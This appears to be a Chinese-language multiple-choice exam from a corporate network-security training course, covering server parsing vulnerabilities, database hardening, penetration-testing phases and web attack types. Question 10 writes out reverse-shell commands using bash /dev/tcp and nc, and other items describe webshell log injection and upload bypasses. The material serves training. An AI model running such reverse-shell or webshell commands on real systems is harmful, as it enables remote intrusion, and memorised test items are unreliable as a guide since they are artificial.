常州港華燃?xì)庥邢薰?網(wǎng)絡(luò)安全工具結(jié)業(yè)考試
1. 您的姓名:
2. 構(gòu)造,asp;.gif這樣的文件名去上傳非法文件利用的是哪個(gè)IIS版本的解析漏洞?( )。
A、IIS4.0;
B、IIS5.0
C、IIS6.0
D、lIS7.0
3. Apache的配置文件名是
A、apache.conf
B、apached.conf
C、http.conf
D、httpd.conf
4. SQL Server默認(rèn)的通訊端口為( ),為提高安全性建議將其修改為其他端口:
A、TCP 1434
B、TCP 1521
C、TCP 1433
D、TCP 1522
5. 下列關(guān)于SQL SERVER數(shù)據(jù)庫安全配置的說法,錯(cuò)誤的是
A、sa用戶需要使用一個(gè)非常強(qiáng)壯的密碼
B、在條件容許情況下,最好使用SSL來加密協(xié)議
C、對(duì)可進(jìn)行網(wǎng)絡(luò)連接的客戶端進(jìn)行IP限制
D、如果不以sa帳號(hào)來管理和使用數(shù)據(jù)庫的話,即使sa帳號(hào)為弱口令也不會(huì)對(duì)系統(tǒng)安全造成影響
6. 在典型的Web應(yīng)用站點(diǎn)的層次結(jié)構(gòu)中,“中間件”是在哪里運(yùn)行的?
A、應(yīng)用服務(wù)器
B、Web服務(wù)器
C、瀏覽器客戶端
D、數(shù)據(jù)庫服務(wù)器
7. 做滲透測試的第一步是()
A、信息收集
B、漏洞分析與目標(biāo)選定
C、拒絕服務(wù)攻擊
D、嘗試漏洞利用
8. SQLSERVER數(shù)據(jù)庫身份驗(yàn)證支持的模式錯(cuò)誤是
A、SQL身份驗(yàn)證模式:
B、Windows身份驗(yàn)證模式
C、Radius身份驗(yàn)證模式
D、Windows和SQL混合驗(yàn)證模式:
9. 下列()不屬于口令入侵所使用的方法
A、暴力破解
B、登錄界面攻擊法
C、漏洞掃描
D、網(wǎng)絡(luò)監(jiān)聽
10. 下列命令可能觸發(fā)反彈shell的是
A、bash -i>& amp; /dev/tcp/10.0.0.1/8080 0>& amp;1
B、ed s:/home/tolstor :/home/lt/
C、nc /bin/sh 10.0.0.1 1234
D、touch 1234
11. Oracle數(shù)據(jù)庫中,以下()命令可以刪除整個(gè)表中的數(shù)據(jù),并且無法回滾
A、Drop
B、Delete
C、Truncate
D、Cascade
12. CSRF攻擊不能做什么
A、刪除用戶信息
B、修改用戶權(quán)限
C、盜取用戶憑證
D、取消訂單
13. 如果向Apache的訪問日志中寫入一句話木馬,需要如何操作才能將一句話寫入到日志中()
A、在URL后面,加上一句話的url編碼格式的內(nèi)容
B、在URL后面,加上一句話的base64編碼格式的內(nèi)容
C、在訪問的URL數(shù)據(jù)體中,直接插入一句話源碼
D、在訪問的URLhttp請(qǐng)求頭部,插入basic字段,并將一句話編碼為base64
14. 攻擊者截獲并記錄了從A到B的數(shù)據(jù),然后又從早些時(shí)候所截獲的數(shù)據(jù)中提取出信息,重放發(fā)往B稱為
A、中間人攻擊
B、口令猜測器和字典攻擊
C、強(qiáng)力攻擊
D、回放攻擊
15. 關(guān)于MS SQL SERVER數(shù)據(jù)庫用戶口令的要求中,對(duì)用戶的性進(jìn)行安全檢查,不包括()
A、空密碼
B、弱密碼
C、密碼長度
D、密碼更新時(shí)間
16. 在圖片中嵌入php代碼,然后訪問xx.jpg%00,php是以下哪種中間件的解析漏洞( )
A、IIS
B、Apache
C、Jobss
D、Nginx
17. 關(guān)于Windows系統(tǒng)的日志審核功能,錯(cuò)誤的說法是
A、進(jìn)程審核,會(huì)產(chǎn)生大量日志
B、特殊對(duì)象審核,可以用來檢測重要文件或目錄
C、如果啟用了“無法記錄安全審核則立即關(guān)閉系統(tǒng)”這條安全策略,有可能對(duì)正常的生產(chǎn)業(yè)務(wù)產(chǎn)生影響
D、日志文件可以用事件査看器或者記事本來直接查看
18. windows中強(qiáng)制終止進(jìn)程的命令是?
A、Tasklist
B、Netsat
C、 Taskkill
D、Netshare
19. 下面哪個(gè)命令可以打印Linux下的所有進(jìn)程信息
A、ls -d
B、ls -l
C、su
D、ps -ef
20. 下列哪一項(xiàng)與數(shù)據(jù)庫的安全有直接關(guān)系?()
A、訪問控制的粒度
B、數(shù)據(jù)庫的大小
C、關(guān)系表中屬性的數(shù)量
D、關(guān)系表中元組的數(shù)量
21. 以下哪個(gè)工具不可以抓取HTTP數(shù)據(jù)包?
A、Burpsuite
B、Wireshark
C、Fiddler
D、Nmap
22. 使用漏洞庫匹配的掃描方法,能發(fā)現(xiàn)什么問題?
A、未知的漏洞
B、已知的漏洞
C、自行設(shè)計(jì)的軟件中的漏洞
D、所有的漏洞
23. APT攻擊是一種以商業(yè)或者政治目的為前提的特定攻擊,其中攻擊者采用口令竊聽、漏洞政擊等方式嘗試進(jìn)一步入侵組織內(nèi)部的個(gè)人電腦和服務(wù)器,不斷提升自己的權(quán)限,直至獲得核心電腦和服務(wù)器控制權(quán)的過程被稱為( )
A、情報(bào)收集
B、防線突破
C、橫向滲透
D、通道建立
24. 張某將微信個(gè)人頭像換成微信群中某好友頭像,并將昵稱改為該好友的昵稱,然后向該好友的其他好友發(fā)送一些欺騙消息。該攻擊行為屬于以下哪類攻擊
A、口令攻擊
B、暴力破解
C、拒絕服務(wù)攻擊
D、社會(huì)工程學(xué)攻擊
25. 在某個(gè)攻擊中,由于系統(tǒng)用戶或系統(tǒng)管理員主動(dòng)泄漏,使得攻擊者可以訪問系統(tǒng)資源的行為被稱作
A、社會(huì)工程
B、非法竊取
C、電子欺騙
D、電子竊聽
26. 對(duì)網(wǎng)絡(luò)系統(tǒng)進(jìn)行滲透測試,通常是按什么順序來進(jìn)行的( )
A、控制階段、偵查階段、入侵階段
B、入侵階段、偵查階段、控制階段
C、偵查階段、入侵階段、控制階段
D、偵查階段、控制階段、入侵階段
27. Linux環(huán)境下,查詢?nèi)罩疚募詈?00行數(shù)據(jù),正確的方式是
A、mv - 100.log
B、grep- 100.log
C、cat- 100.log
D、tail- 100.log
28. XXE漏洞可以做什么
A、盜取用戶cookie
B、讀取服務(wù)器文件
C、網(wǎng)絡(luò)釣魚
D、獲取用戶瀏覽器信息
29. 關(guān)于XSS漏洞分類說法錯(cuò)誤的是()
A、存儲(chǔ)型XSS
B、反射型XSS
C、擴(kuò)展性XSS
D、DOM型XSS
30. 李工在使用web掃描器對(duì)目標(biāo)網(wǎng)絡(luò)進(jìn)行掃描時(shí)發(fā)現(xiàn),某一個(gè)主機(jī)開放了25和110端口,此主機(jī)最有可能是什么
A、文件服務(wù)器
B、郵件服務(wù)器
C、WEB服務(wù)器
D、DNS服務(wù)器
31. 某系統(tǒng)被攻擊者入侵,初步懷疑為管理員存在弱口令,攻擊者從遠(yuǎn)程終端以管理員身份登錄進(jìn)行系統(tǒng)進(jìn)行了相應(yīng)的破壞,驗(yàn)證此事應(yīng)查看:()
A、系統(tǒng)日志
B、應(yīng)用程序日志
C、安全日志
D、IIS 日志
32. 按數(shù)據(jù)結(jié)構(gòu)分類,只有關(guān)系型數(shù)據(jù)庫和非關(guān)系型數(shù)據(jù)庫。
A、正確
B、錯(cuò)誤
33. 信息系統(tǒng)是絕對(duì)完全的。
A、正確
B、錯(cuò)誤
34. 可以沒有獲得授權(quán)就去挖掘任何系統(tǒng)的漏洞。
A、正確
B、錯(cuò)誤
35. WAF能夠完成對(duì)應(yīng)用程序的防護(hù)。
A、正確
B、錯(cuò)誤
36. 關(guān)于Linux下的用戶和組,用戶和組的關(guān)系可以是多對(duì)一,一個(gè)組可以有多個(gè)用戶,一個(gè)用戶不能屬于多個(gè)組。
A、正確
B、錯(cuò)誤
37. OWATOP10是哪十個(gè)?
38. 結(jié)合網(wǎng)絡(luò)安全常見攻擊方法。任意挑選兩個(gè),集合工作場景,描述防御思路和處置方法。
關(guān)閉
更多問卷
復(fù)制此問卷